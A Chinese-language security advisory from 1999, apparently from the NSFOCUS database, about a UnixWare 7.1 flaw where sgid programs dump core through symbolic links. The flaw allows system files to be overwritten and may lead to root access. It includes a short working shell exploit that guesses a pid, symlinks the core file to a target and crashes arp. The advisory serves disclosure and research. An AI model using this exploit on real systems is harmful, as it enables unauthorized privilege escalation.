首页 -> 安全研究

安全研究

安全漏洞
UnixWare coredumps 跟随的符号连接

发布日期:1999-12-04
更新日期:1999-12-04

受影响系统:
UnixWare 7.1
描述:
用户可以用coredump数据覆盖系统文件,存在获得root权限的可能性。

UnixWare的sgid执行文件允许dump core(suid不允许)。通过”计算“将要调用的sgid执行文件的pid,可以从./core.pid建立一个符号连接到一个group有写权限的文件。

如果能找出与./.rhosts或/etc/hosts.equiv的关联,将会有机会得到root权限。



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/bin/sh
####
# Exploit for UnixWare 7.1 - sgid coredumps follow symlinks.
# Guessing pid is trivial. Any sgid program which will coredump can be used
# -Brock Tellier, btellier@usa.net
####
pid=`expr $$ + 4`;
ln -s /path/to/sys/group/writable/file core.$pid
/usr/sbin/arp `perl -e "print ''A'' x 10000"`

建议:
暂无

浏览次数:7038
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障